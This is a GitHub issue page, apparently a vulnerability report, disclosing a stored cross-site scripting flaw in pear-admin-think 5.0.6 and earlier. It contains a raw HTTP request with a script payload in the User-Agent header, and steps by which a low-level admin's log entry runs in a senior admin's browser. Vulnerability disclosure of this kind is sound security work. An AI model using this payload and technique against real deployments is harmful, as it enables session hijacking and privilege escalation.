Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in pear-admin-think <=5.0.6. Login account to access arbitrary functions and cause stored xss through fake User-Agent
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/pearadmin/pear-admin-think
[Affected Product Code Base] <= 5.0.6
[Affected Component]
GET /admin.php/admin.photo/index HTTP/1.1 Host: pear.com Upgrade-Insecure-Requests: 1 User-Agent: <script>alert('xss')</script> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://pear.com/admin.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8,en;q=0.7 Cookie: PHPSESSID=23c79928dabeae8f8bf5f314b506af17; thinkphp_show_page_trace=0|0; token=JLlWdnblQBd0Ol7lKSe2w25Dj0jjoAQq31642737531.5216 Connection: close
[Attack Type] Remote
[Vulnerability details] first, prepare two test accounts with different levels. Senior administrator admin
Low level administrator test
Step 2: log in to the system with test and enter the user management page
Click on any function such as image management and Interception of request packets , Modify UA to xss payload and forward it
Step 3 now log into the system with Senior administrator admin
Step 4 click System Management->Backend Log the xss will be execute
[Impact Code execution] true
The text was updated successfully, but these errors were encountered:
No branches or pull requests
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in pear-admin-think <=5.0.6.
Login account to access arbitrary functions and cause stored xss through fake User-Agent
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/pearadmin/pear-admin-think
[Affected Product Code Base]
<= 5.0.6
[Affected Component]
[Attack Type]
Remote
[Vulnerability details]

first, prepare two test accounts with different levels.
Senior administrator admin
Low level administrator test

Step 2: log in to the system with test and enter the user management page

Click on any function such as image management and Interception of request packets , Modify UA to xss payload and forward it

Step 3 now log into the system with Senior administrator admin

Step 4 click System Management->Backend Log the xss will be execute

[Impact Code execution]
true
The text was updated successfully, but these errors were encountered: